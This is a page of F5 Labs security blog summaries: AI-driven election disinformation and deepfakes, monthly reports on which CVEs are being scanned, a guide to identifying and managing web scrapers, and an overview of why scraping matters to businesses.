f5 labs
22 TopicsThree Ways AI Can Hack the U.S. Election
The growing capability of AI content poses three very real threats to modern elections. We explain each, and take a glimpse at a possible solution to the growing AIpocalypse. In 2020, we covered Three Ways to Hack the U.S. Election. That article is every bit as relevant today as it was four years ago. At the time, we focused on the ways in which disinformation could be used to misinform and divide the nation. Now, the digital landscape has shifted with generative AI and deepfakes posing even more threats. In our recent article, Three Ways AI Can Hack the U.S. Election, we explore disinformation and deepfakes, voter suppression tactics, and the role bots have in spreading disinformation. (This is just a summary - click here to read the full article on f5.com/labs.) Disinformation and Deepfakes Election security is all about trust. Disinformation has become a geopolitical weapon, and it is easier than ever to create convincing fake content through generative AI and machine learning tools. AI manipulators can easily change aspects of video, such as backgrounds or facial expressions, to deepfake audio. The boundaries between real and fake have been blurred, with gen AI tools allowing anyone to create realistic content at virtually no cost. Voter Suppression Beyond creating fake content for disinformation, deepfakes can have other nefarious purposes. For example, in 2024, Steve Kramer, a political consultant, admitted to orchestrating a widespread robocall operation using deepfake technology to mimic President Joe Biden’s voice, which discouraged thousands of New Hampshire voters from participating in the state’s presidential primary. The call used caller ID spoofing to disguise its origins. Kramer spent $500 to generate $5 million worth of media coverage and was fined $6 million by the FCC for orchestrating illegal robocalls. Dissemination and Widening the Divide Bots and automation are a significant factor in spreading disinformation on social media platforms like X/Twitter. They can amplify false narratives, manipulate public opinion, and create the illusion of widespread consensus on controversial topics. Bots can share misleading content, interact with genuine users, and boost the visibility of posts, making it difficult for users to differentiate between organic engagement and orchestrated campaigns. AI can significantly enhance the capabilities of social media bots by creating fully-realized, convincing personas, interacting with real and fake users, and creating an illusion of authenticity. AI-enhanced bots can also craft highly realistic posts on a wide range of topics, making them powerful tools for influencing conversations and shaping public opinion. Future AI TV news, once considered trustworthy due to its live, real-time broadcasting, is becoming increasingly susceptible to fake news and AI-generated content. Advancements in AI could lead to AI-generated anchors delivering and reacting to real-world events in real-time, blurring the line between authentic and synthetic information. Emotionally intelligent AI can also be used to manipulate social divides by analyzing emotional cues in real-time, allowing disinformation campaigns to manipulate individuals and fuel polarization. This could further fuel polarization and divisive issues. Combating Fake and AI-generated Content The Coalition for Content Provenance and Authenticity (C2PA) protocol is a standards-based initiative developed by Adobe, Microsoft, Intel, and the BBC to combat disinformation and fabricated media, particularly in the era of AI-generated content. Figure 2. Example video with embedded C2PA digital watermark. Source: c2pa.org It attaches verifiable metadata to digital media files, allowing creators to disclose key information about the origin and editing history of an image, video, or document. C2PA uses cryptographic signatures to detect any tampering with metadata, allowing viewers to access information across platforms. This approach is crucial in combating AI-generated fake content, such as deepfakes, and providing reliable tools for publishers and consumers to judge the trustworthiness of digital media. Conclusion The threat of disinformation and AI is growing. While C2PA offers protection, its limitations include the lack of widespread adoption, the need for public education, and potential skepticism and distrust. Check out the full article written by David Warburton, Director of F5 Labs here.18Views0likes0CommentsBotPoke Scanner Switches IP
Welcome to the October 2024 installment of the Sensor Intelligence Series (SIS), our monthly summary of vulnerability intelligence based on distributed passive sensor data. Below are a few key highlights from this month’s summary. Scanning for CVE-2017-9841 has significantly decreased, while CVE-2023-1389, an RCE vulnerability in TP-Link Archer AX21 routers, continues to be the most scanned CVE. The BotPoke scanner’s activity has shifted from a Lithuanian IP address to one in Hong Kong, with the new IP accounting for 31.5% of all traffic observed. Monthly averages for the 110 tracked CVEs have remained stable, while CVE-2017-18368 exhibited erratic scanning patterns. BotPoke Scanner Switches IP Address The BotPoke scanner, associated with an IPv4 address (141.98.11.114), disappeared from our logs this month. However, the scanning activity moved from Lithuanian to Hong Kong (154.213.184.3), which accounts for 31.5% of all traffic observed this month. The scanner continued targeting the same URIs and regions where our sensors reside. October Vulnerabilities by the Numbers Figure 1 shows October attack traffic for top ten CVEs we track, with CVE-2023-1389 dominating. Figure 1: Top ten vulnerabilities by traffic volume in October 2024. CVE-2023-1389 continues to dominate all other CVEs we track in terms of volume. Targeting Trends Figure 2 shows traffic volume and position changes over the past year, with heavy scanning for CVE-2023-1389 and decline for CVE-2017-9841, and CVE-2020-11625 rising to second place. Figure 2: Evolution of vulnerability targeting in the last twelve months. Note the continued falloff in scanning for CVE-2017-9814, and the slight increase in scanning for CVE-2020-11625. Long-Term Trends Figure 3 shows the top 20 CVEs’ traffic and monthly averages. Scanning for CVE-2017-8941 and CVE-2023-1389 showed a precipitous rise and fall, while CVE-2020-11625 rose from single digits to 1000s. The average of other 110 CVEs remained constant this month, with CVE-2017-18368 showing a jagged scanning pattern. Figure 3: Traffic volume by vulnerability. This view accentuates the recent changes in both CVE-2023-1389 and CVE-2017-9841, well as the increase in scanning for CVE-2020-11625 and CVE-2017-18368. To find out more about October’s CVEs and for recommendations on how to stay ahead of the curve in cybersecurity, https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip. See you next month!30Views0likes0CommentsContinued Intense Scanning From One IP in Lithuania
Welcome to the September 2024 installment of the Sensor Intelligence Series (SIS), our monthly summary of vulnerability intelligence based on distributed passive sensor data. Below are a few key takeaways from this month’s summary. Scanning for CVE-2017-9841 dropped by 10% (vs. August). CVE-2023-1389 continues to be the most scanned CVE we track, with a 400% increase over August. One IP address continues to be the most observed, accounting for 43% of overall scanning traffic observed. We see a spike in the scanning of CVE-2023-25157, a Critical vulnerability in the GeoServer software project. CVE Scanning Following on from our last month’s analysis, the scanning of CVE-2017-9841 has decreased by 10% compared to August and is down 99.8% from its high-water mark in June of 2024, and nearly vanishing from our visualizations. CVE-2023-1389, an RCE vulnerability in TP-Link Archer AX21 routers, has been the most scanned CVE for the last two months, increasing 400% over August. While this sort of swing in volume may seem remarkable, as we have noticed before, it’s not unusual when we analyze the shape of the scanning for a particular CVE over time. Following Up on an Aberration Last month, a pattern of scanning activity was identified coming from a specific IPv4 address (141.98.11.114), which was suspected to be the BotPoke scanner. Despite a slight decrease in scanning traffic, this IP continued to target the same URIs and regions where our sensors are located, accounting for 43% of the overall scanning traffic observed. A Brief Note on Malware Stagers Observed Our passive sensors, which do not respond to traffic, limit our ability to predict secondary actions after successful exploitation. However, we can show that some CVEs are attempted to be used and downloaded malware stagers. To view an example of the most common URL observed in September attempting to exploit CVE-2023-1389visit F5 Labs to read the full summary. September Vulnerabilities by the Numbers Figure 1 shows September attack traffic for the top ten CVEs, with CVE-2023-1389 dominating. Increased scanning for this vulnerability throws off the proportionality of this view. However, see the logarithmic scale (figure 3) for an easier view. Figure 2 shows a significant increase in scanning for CVE-2023-1389 over the past year, while a decline in scanning for CVE-2017-9841 persists. Long-Term Trends Figure 3 shows the traffic for the top 19 CVEs, with CVE-2017-8941 and CVE-2023-1389 showing significant increases. The average of the other 110 CVEs has fallen dramatically. CVE-2023-25157, a critical vulnerability in the GeoServer software project, has seen a dramatic increase in scanning. The log scale helps show changes in other top 10 scanned CVEs. To find out more about September’s CVEs and for recommendations on how to stay ahead of the curve in cybersecurity, check out the full article here. We’ll see you next month!67Views1like0CommentsHow to Identify and Manage Scrapers (Pt. 2)
Introduction Welcome back to part two of the article on how to identify and manage scrapers. While part one focused on ways to identify and detect scrapers, part two will highlight various approaches to prevent, manage, and reduce scraping. 9 Ways to Manage Scrapers We'll start by highlighting some of the top methods used to manage scrapers in order to help you find the method best suited for your use case. 1. Robots.txt The robots.txt file on a website contains rules for bots and scrapers, but it lacks enforcement power. Often, scrapers ignore these rules, scraping data they want. Other scraper management techniques are needed to enforce compliance and prevent scrapers from ignoring these rules. 2. Site, App, and API Design to Limit Data Provided to Bare Minimum To manage scrapers, remove access to desired data, which may not always be feasible due to business-critical requirements. Designing websites, mobile apps, and APIs to limit or remove exposed data effectively reduces unwanted scraping. 3. CAPTCHA/reCAPTCHA CAPTCHAs (including reCAPTCHA and other tests) are used to manage and mitigate scrapers by presenting challenges to prove human identity. Passing these tests grants access to data. However, they cause friction and decrease conversion rates. With advancements in recognition, computer vision, and AI, scrapers and bots have become more adept at solving CAPTCHAs, making them ineffective against more sophisticated scrapers. 4. Honey Pot Links Scrapers, unlike humans, can see hidden elements on a web page, such as form fields and links. Security teams and web designers can add these to web pages, allowing them to respond to transactions performed by scrapers, such as forwarding them to a honeypot or providing incomplete results. 5. Require All Users to be Authenticated Most scraping occurs without authentication, making it difficult to enforce access limits. To improve control, all users should be authenticated before data requests. Less motivated scrapers may avoid creating accounts, while sophisticated scrapers may resort to fake account creation. F5 Labs published an entire article series focusing on fake account creation bots. These skilled scrapers distribute data requests among fake accounts, adhering to account-level request limits. Implementing authentication measures could discourage less-motivated scrapers and improve data security. 6. Cookie/Device Fingerprint-Based Controls To limit user requests, cookie-based tracking or device/TLS fingerprinting can be used, but they are invisible to legitimate users and can't be used for all users. Challenges include cookie deletion, collisions, and divisions. Advanced scrapers using tools like Browser Automation Studio (BAS) have anti-fingerprint capabilities including fingerprint switching, which can help them bypass these types of controls. 7. WAF Based Blocks and Rate Limits (UA and IP) Web Application Firewalls (WAFs) manage scrapers by creating rules based on user agent strings, headers, and IP addresses, but are ineffective against sophisticated scrapers who use common user agent strings, large numbers of IP addresses, and common header orders, making WAFs ineffective. 8. Basic Bot Defense Basic bot defense solutions use JavaScript, CAPTCHA, device fingerprinting, and user behavior analytics to identify scrapers. They don't obfuscate signals collection scripts, encrypt, or randomize them, making it easy for sophisticated scrapers to reverse engineer. IP reputation and geo-blocking are also used. However, these solutions can be bypassed using new generation automation tools like BAS and puppeteer, or using high-quality proxy networks with high reputation IP addresses. Advanced scrapers can easily craft spoofed packets to bypass the defense system. 9. Advanced Bot Defense Advanced enterprise-grade bot defense solutions use randomized, obfuscated signals collection to prevent reverse engineering and tamper protection. They use encryption and machine learning (ML) to build robust detection and mitigation systems. These solutions are effective against sophisticated scrapers, including AI companies, and adapt to varying automation techniques, providing long-term protection against both identified and unidentified scrapers. Scraper Management Methods/Controls Comparison and Evaluation Table 1 (below) evaluates scraper management methods and controls, providing a rating score (out of 5) for each, with higher scores indicating more effective control. Control Pros Cons Rating Robot.txt +Cheap +Easy to implement +Effective against ethical bots -No enforcement -Ignored by most scrapers 1 Application redesign +Cheap -Not always feasible due to business need 1.5 CAPTCHA +Cheap +Easy to implement -Not always feasible due to business need 1.5 Honey pot links +Cheap +Easy to implement -Easily bypassed by more sophisticated scrapers 1.5 Require authentication +Cheap +Easy to implement +Effective against less motivated scrapers -Not always feasible due to business need -Results in a fake account creation problem 1.5 Cookie/fingerprint based controls +Cheaper than other solutions +Easier to implement +Effective against low sophistication scrapers -High risk of false positives from collisions -Ineffective against high to medium sophistication scrapers 2 Web Application Firewall +Cheaper than other solutions +Effective against low to medium sophistication scrapers -High risk of false positives from UA, header or IP based rate limits -Ineffective against high to medium sophistication scrapers 2.5 Basic bot defense +Effective against low to medium sophistication scrapers -Relatively expensive -Ineffective against high sophistication scrapers -Poor long term efficacy -Complex to implement and manage 3.5 Advanced bot defense +Effective against the most sophisticated scrapers +Long term efficacy -Expensive -Complex to implement and manage 5 Conclusion There are many methods of identifying and managing scrapers, as highlighted above, each with its pros and cons. Advanced bot defense solutions, though costly and complex, are the most effective against all levels of scraper sophistication. To read the full article in its entirety, including more detail on all the management options described here, head over to our post on F5 Labs.43Views0likes1CommentHow to Identify and Manage Scrapers (Pt. 1)
Introduction The latest addition in our Scraper series focuses on how to identify and manage scrapers, but we’ll be splitting up the article into two parts. Part one will focus on outlining ways to identify and detect scrapers, while part two will focus on tactics to help manage scrapers. How to Identify Scraping Traffic The first step in identifying scraping traffic involves detecting various methods based on the scraper’s motivations and approaches. Some scrapers, like benign search bots, self-identify for network and security permission. Others, like AI companies, competitors, and malicious scrapers, hide themselves, making detection difficult. More sophisticated approaches are needed to combat these types of scrapers. Self-Identifying Scrapers There are several scrapers that announce themselves and make it very easy to identify them. These bots self-identify using the HTTP user agent string, indicating explicit permission or belief in providing valuable service. These bots can be classified into three categories. Search Engine Bots/Crawlers Performance or Security Monitoring Archiving Several scraper websites offer detailed information on their scrapers, including identification, IP addresses, and opt-out options. It's crucial to review these documents for scrapers of interest, as unscrupulous scrapers often impersonate known ones. Websites often provide tools to verify if a scraper is real or an imposter. Links to these documentation and screenshots are provided in our full blog on F5 Labs. Many scrapers identify themselves via the user agent string. A string is usually added to the user-agent string that contains the following. The name of the company, service or tool that is doing the scraping A website address for the company, service or tool that is doing the scraping A contact email for the administrator of the entity doing the scraping Other text explaining what the scraper is doing or who they are A key way to identify self-identifying scrapers is to search the user-agent field in your server logs for specific strings. Table 1 below outlines common strings you can look for. Table 1: Search strings to find self-identifying scrapers (* is a wildcard) Self Identification method Search String Name of the tool or service *Bot * or *bot* Website address *www* or *.com* Contact Email *@* Examples of User Agent Strings OpenAI searchbot user agent string: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; OAI- SearchBot/1.0; +https://openai.com/searchbot Bing search bot user agent string: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; + http://www.bing.com/bingbot.htm) Chrome/ These scrapers have both the name of the tool or service, as well as the website in the user-agent string and can be identified using two of the methods highlighted in Table 1 above. Impersonation Because user agents are self-reported, they are easily spoofed. Any scraper can pretend to be a known entity like Google bot by simply presenting the Google bot user agent string. We have observed countless examples of fake bots impersonating large known scrapers like Google, Bing and Facebook. As one example, Figure 1 below shows here the traffic overview of a fake Google scraper bot. This scraper was responsible for almost a hundred thousand requests per day against a large US hotel chain’s room search endpoints. The bot used the following user-agent string, which is identical to the one used by the real Google bot. Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) (765362) IP-based Identification Scrapers can identify themselves via their IP addresses. Whois lookups can reveal the IP address of a scraper, their organization, or their registered ASNs. While not revealing the identity of the actual entity, they can be useful in certain cases. Geolocation information can also be used to identify automated scraping activity. Reverse DNS lookups help identify the scraper’s identity by using the Domain Name System (DNS) to find the domain name associated with an IP address, which can be identified by using free online reverse DNS lookup services. Since IP address spoofing is non-trivial, identifying and allowlisting scrapers using IP addresses is more secure than simply using user agents. Artificial Intelligence (AI) Scrapers Artificial intelligence companies are increasingly using internet scraping to train models, causing a surge in data scraping. This data is often used for for-profit AI services, which sometimes compete with scraping victims. Several lawsuits are currently underway against these companies. A California class-action lawsuit has been filed by 16 claimants against OpenAI, alleging copyright infringement due to the scraping and use of their data for model training. Due to all the sensitivity around AI companies scraping data from the internet, a few things have happened. Growing scrutiny of these companies has forced them to start publishing details of their scraping activity and ways to both identify these AI scrapers as well as ways to opt out of your applications being scraped. AI companies have seen an increase in opt-outs from AI scraping, resulting in them being unable to access the data needed to power their apps. Some less ethical AI companies have since set up alternative “dark scrapers” which do not self-identify, and instead secretly continue to scrape the data needed to power their AI services. Unidentified Scrapers Most scrapers don't identify themselves or request explicit permission, leaving application, network, and security teams unaware of their activities on Web, Mobile, and API applications. Identifying scrapers can be challenging, but below you'll find two techniques that we have used in the past that can help identify the organization or actors behind them. To view additional techniques along with an in-depth explanation of each, head over toour blog post on F5 Labs. 1. Requests for Obscure or Non-Existent Resources Website scrapers crawl obscure or low-volume pages, requesting resources like flight availability and pricing. They construct requests manually, sending them directly to airline origin servers. Figure 2 shows an example of a scraper that was scraping an airline’s flights and requesting flights to and from a train station. 2. IP Infrastructure Analysis, Use of Hosting Infra or Corporate IP Ranges (Geo Location Matching) Scrapers distribute traffic via proxy networks or bot nets to avoid IP-based rate limits, making it easier to identify them. Some of these tactics include: Round-robin IP or UA usage Use of hosting IPs Use of low-reputations IPs Use of international IPs that do not match expected user locations The following are additional things to keep in mind when trying to identify scrapers. We provide an in-depth overview of each in our full article on F5 Labs. Conversion or look-to-book analysis Not downloading or fetching images and dependencies but just data Behavior/session analysis Conclusion We discussed two methods above that might be helpful in identifying a scraper. However, keep in mind that it's crucial to take into account the type of scraper and the sort of data they are targeting in order to correctly identify it. To read the full article on identifying scrapers, which includes more identification methods, head on over toour post on F5 Labs. Otherwise, continue on to part two where we’ll outline tactics to help manage scrapers.58Views1like0CommentsWhat Are Scrapers and Why Should You Care?
Introduction Scrapers are automated tools designed to extract data from websites and APIs for various purposes, posing significant threats to organizations of all sizes. They can lead to intellectual property theft, competitive advantage erosion, website/API performance degradation, and legal liabilities. Scraping is one of the top 10 automated threats by OWASP, defined as using automation to collect application content and/or other data for use elsewhere. It impacts businesses across various industries and its legal status varies depending on geographic and legal jurisdictions. What is Scraping? Scraping involves requesting web pages, loading them, and parsing the HTML to extract the desired data and content. Examples of heavily scraped items include: Flights Hotel rooms Retail product prices Insurance rates Credit and mortgage interest rates Contact lists Store locations User profiles Scrapers use automation to make many smaller requests and put the data together in pieces, often with tens of thousands or even millions of individual requests. In the 2024 Bad Bots Review by F5 Labs, scraping bots were responsible for high levels of automation on two of the three most targeted flows, Search and Quotes, throughout 2023 across the entire F5 Bot Defense network. See figure 1 below. In addition, up to 70% of all search traffic originates from scrapers without advanced bot defense solutions. This percentage is based on the numerous proof of concept analyses done for enterprises with no advanced bot controls in place. Scraper versus Crawler or Spider Scrapers are different from crawlers or spiders in that they are mostly designed to get data and content from a website or API. Crawlers and spiders are used to list websites for search engines. Scrapers are designed to extract and exfiltrate data and content from the website or API, which can then be reused, resold, and otherwise repurposed as the scraper intends. Scraping is typically in violation of the terms and conditions of most websites and APIs, with some cases overturning previous rulings. Most scrapers target information on the web, but activity against APIs is on the rise. Business Models for Scraping There are many different parties active in the scraping business, with different business models and incentives for scraping content and data. Figure 2 below provides an overview of the various sources of scraping activity. The scraping industry involves various parties with different business models and incentives for scraping content and data. Search engine companies, such as Google, Bing, Facebook, Amazon, and Baidu, index content from websites to help users find things on the internet. Their business model is selling ads placed alongside search results. Competitors scrape content and data from each other to win customers, market share, and revenue. They use scraping to increase market share, competitive pricing, network scraping, inventory scraping, researchers, and investment firms, intellectual property owners, data aggregators, news aggregators, and AI companies. Competitors scrape pricing and availability of competitor products to win increased market share. Network scraping involves scraping the names, addresses, and contact details of a company's network partners, such as repair shops, doctors, hospitals, clinics, insurance agents, and brokers. Inventory scraping involves stealing valuable content and data from a competing site for use on their own site. Researchers and investment firms use scraping to gather data for their research and generate revenue by publishing and selling the results of their market research. Intellectual property owners use scraping to identify possible trademark or copyright infringements and ensure compliance with pricing and discounting guidelines. Data aggregators collect and aggregate data from various sources and sell it to interested parties. Some specialize in specific industries, while others use scrapers to pull news feeds, blogs, articles, and press releases from various websites and APIs. Artificial Intelligence (AI) companies scrape data across various industries, often without identifying themselves. As the AI space continues to grow, scraping traffic is expected to increase. Criminal organizations often scrape websites or applications for various malicious purposes--including phishing, vulnerability scanning, identity theft, and intermediation. Criminals use scrapers to create replicas of the victim’s website or app, requiring users to provide personal information (PII). They also use scrapers to test for vulnerabilities in the website or application, such as allowing them to access discounted rates or back-end systems. Costs of Scraping Direct costs of scraping include infrastructure costs, server performance, and outages, loss of revenue and market share, and intermediary-driven intermediation. Companies prefer direct relationships with customers for selling and marketing, customer retention, cross-selling, and upselling, and customer experience. However, indirect costs include loss of investment, intellectual property, reputational damage, legal liability, and questionable practices. Scraping can lead to a loss of revenue, profits, market share, and customer satisfaction. Indirect costs include the loss of intellectual property, reputational damage, legal liability, and questionable practices. Companies may lose control over the end-to-end customer experience when intermediaries are involved, leading to dissatisfied customers. Conclusion Scraping is a significant issue that affects enterprises worldwide in various industries. F5 Labs' research shows that almost 1 in 5 search and quote transactions are generated by scrapers. It is usually done by various entities, including search engines, competitors, AI companies, and malicious third parties. These costs result in the loss of revenue, profits, market share, and customer satisfaction. For a deeper dive into the impact of scraping on enterprises and effective mitigation strategies, read the full article on F5 Labs.95Views2likes0CommentsSIS March 2024: TP-Link Archer AX21 Wifi Router targeting, plus a handful of new CVEs!
The March 2024 Sensor Intelligence Series report highlights a significant surge in scanning activity for the vulnerability CVE-2023-1389 and also notes that most of the scanning traffic originates from two ASNs, suggesting a concentrated effort from specific sources.104Views1like0CommentsThis Month In Security for October, 2022
This Month In Security is a partnership between F5 Security Incident Response Team's AaronJB(Aaron Brailsford), F5 Labs' David Warburton and Tafara Muwandi and F5 DevCentral's AubreyKingF5. This month's news includes some Supply Chain Security, Guidance from CISA and a worrisome UEFI Bootkit.379Views2likes0Comments